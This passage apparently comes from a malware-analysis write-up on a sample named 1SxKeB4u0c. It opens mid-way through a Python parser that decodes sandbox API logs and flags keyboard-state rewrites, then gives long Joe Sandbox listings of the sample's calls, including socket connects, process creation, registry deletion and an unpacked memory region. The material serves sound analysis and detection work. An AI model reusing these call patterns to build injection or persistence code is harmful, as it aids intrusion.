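        key_name = VIRTUAL_KEYS.get(wparam, f"0x{wparam:02X}" if isinstance(wparam, int) else "?")
    else:
        key_name = f"wParam=0x{wparam:X}" if isinstance(wparam, int) else "wParam=?"
    return ("%08X" % call["ref"], msg_name, key_name)


def summarize_key_injection(text):
    """Decode posted key messages and flag a GetKeyboardState -> SetKeyboardState rewrite."""
    calls = [c for c in (parse_call(line) for line in text.splitlines()) if c]
    messages, modifiers = [], set()
    for call in calls:
        decoded = decode_post_message(call)
        if decoded and decoded[1] in ("WM_KEYDOWN", "WM_KEYUP", "WM_SYSKEYDOWN", "WM_SYSKEYUP"):
            messages.append(decoded)
            if decoded[2] in VIRTUAL_KEYS.values():
                modifiers.add(decoded[2])
    apis = [c["api"] for c in calls]
    rewrites = ("GetKeyboardState" in apis and "SetKeyboardState" in apis
                and apis.index("GetKeyboardState") < apis.index("SetKeyboardState"))
    return {"messages": messages, "modifiers": sorted(modifiers),
            "rewrites_keyboard_state": rewrites}


if __name__ == "__main__":
    for ref, msg, key in summarize_key_injection(SAMPLE_CALLS)["messages"]:
        print(ref, msg, key)
```

Run over every "APIs" block of a report, the same parser separates the interpreter's own plumbing (synthetic keyboard input, menu handling, registry and file helpers in the 0x00400000 image, which is "based on PE: true") from code in regions the report marks "based on PE: false", such as the 0x02F10000 dump below, which is where an unpacked or injected stage would be expected to live.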
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02F58311,?,00000000,?,00000000,00000000), ref: 02F57BDE
• __fassign.LIBCMT ref: 02F57C59
• __fassign.LIBCMT ref: 02F57C74
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02F57C9A
• WriteFile.KERNEL32(?,?,00000000,02F58311,00000000,?,?,?,?,?,?,?,?,?,02F58311,?), ref: 02F57CB9
• WriteFile.KERNEL32(?,?,00000001,02F58311,00000000,?,?,?,?,?,?,?,?,?,02F58311,?), ref: 02F57CF2
Memory Dump Source
• Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 113cc342b61fdc85e8ff9ce9b3d7808df4e60c2a3f50ff56177c27f1ae5a7447
• Instruction ID: ab84bf6df324ad394f49a2c17d1abef14179241d8ea28f29373d5fb5b7a5fd9e
• Opcode Fuzzy Hash: 113cc342b61fdc85e8ff9ce9b3d7808df4e60c2a3f50ff56177c27f1ae5a7447
• Instruction Fuzzy Hash: 3A51B171E002599FDB10DFA8D884AEEFBB9EF09340F14455AEB56E7281D730A951CBA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
• Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
• Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
• Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,I$DllGetClassObject
• API String ID: 753597075-1683996018
• Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
• Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
• Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
• Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
APIs
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
• lstrcmpiW.KERNEL32(?,?), ref: 004636B7
• _wcscmp.LIBCMT ref: 004636D3
• MoveFileW.KERNEL32(?,?), ref: 004636EB
• _wcscat.LIBCMT ref: 00463733
• SHFileOperationW.SHELL32(?), ref: 0046379F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
• Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
• Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
• Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
APIs
• _memset.LIBCMT ref: 004872AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
• IsMenu.USER32(?), ref: 00487369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
• DrawMenuBar.USER32 ref: 004873C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
• Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
• Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
• Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
• FreeLibrary.KERNEL32(00000000), ref: 004810B5
  • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
  • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
  • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
• Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
• Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
• Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
• GetWindowLongW.USER32(00A5C970,000000F0), ref: 0048631F
• GetWindowLongW.USER32(00A5C970,000000F0), ref: 00486354
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
• Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
• Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
• Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                              APIs
                                                                                • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                              • WSAGetLastError.WSOCK32 ref: 00476221
                                                                              • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 910771015-0
                                                                              • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                              • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                              • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                              • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                              • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                                                              • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                              • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                                                              APIs
                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                              • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                              • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                              • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                                              APIs
                                                                                • Part of subcall function 02F531DA: _free.LIBCMT ref: 02F53203
                                                                              • _free.LIBCMT ref: 02F53264
                                                                                • Part of subcall function 02F52096: HeapFree.KERNEL32(00000000,00000000,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?), ref: 02F520AC
                                                                                • Part of subcall function 02F52096: GetLastError.KERNEL32(?,?,02F53208,?,00000000,?,00000000,?,02F5322F,?,00000007,?,?,02F52697,?,?), ref: 02F520BE
                                                                              • _free.LIBCMT ref: 02F5326F
                                                                              • _free.LIBCMT ref: 02F5327A
                                                                              • _free.LIBCMT ref: 02F532CE
                                                                              • _free.LIBCMT ref: 02F532D9
                                                                              • _free.LIBCMT ref: 02F532E4
                                                                              • _free.LIBCMT ref: 02F532EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                              • Instruction ID: a7e99d290bfe2c07e89a5919acf851c7b6f57b9466dc14771cc5b854f372563e
                                                                              • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                              • Instruction Fuzzy Hash: 2A111C72E41B24AAE630FBB4CC05FCB779EAF06BC0F444D55AF9EA6050DA65B5048F50
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0048B644
                                                                              • _memset.LIBCMT ref: 0048B653
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                                                              • CloseHandle.KERNEL32 ref: 0048B694
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseCreateHandleProcess
                                                                              • String ID: oL$doL
                                                                              • API String ID: 3277943733-3421622115
                                                                              • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                              • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                                                              • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                              • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                              • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                              • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 3489934621-2819208100
                                                                              • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                              • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                              • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                              • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,02F5473A,?,?,00000000), ref: 02F54543
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02F5473A,?,?,00000000,?,?,?), ref: 02F545C9
                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02F546C3
                                                                              • __freea.LIBCMT ref: 02F546D0
                                                                                • Part of subcall function 02F532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F5332C
                                                                              • __freea.LIBCMT ref: 02F546D9
                                                                              • __freea.LIBCMT ref: 02F546FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1414292761-0
                                                                              • Opcode ID: 8a389d195d85f92800fd3567df546589c6ad221c7cae6ac5dae5445dc0ecab2d
                                                                              • Instruction ID: 7f4997fd52144fc8269a10bf9c637467e2e106dd6c598ec0a6e0853fd51a1078
                                                                              • Opcode Fuzzy Hash: 8a389d195d85f92800fd3567df546589c6ad221c7cae6ac5dae5445dc0ecab2d
                                                                              • Instruction Fuzzy Hash: E951A372A10226ABDB258E64CC41FAFB7EAEB446D4F154629FF05D7180EB74DC90CE90
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 3253778849-0
                                                                              • Opcode ID: 5bebe8ed2a5bd69edc0496f69af5ac54aa813bc85d82d6a06f8f7627e15d20aa
                                                                              • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                              • Opcode Fuzzy Hash: 5bebe8ed2a5bd69edc0496f69af5ac54aa813bc85d82d6a06f8f7627e15d20aa
                                                                              • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
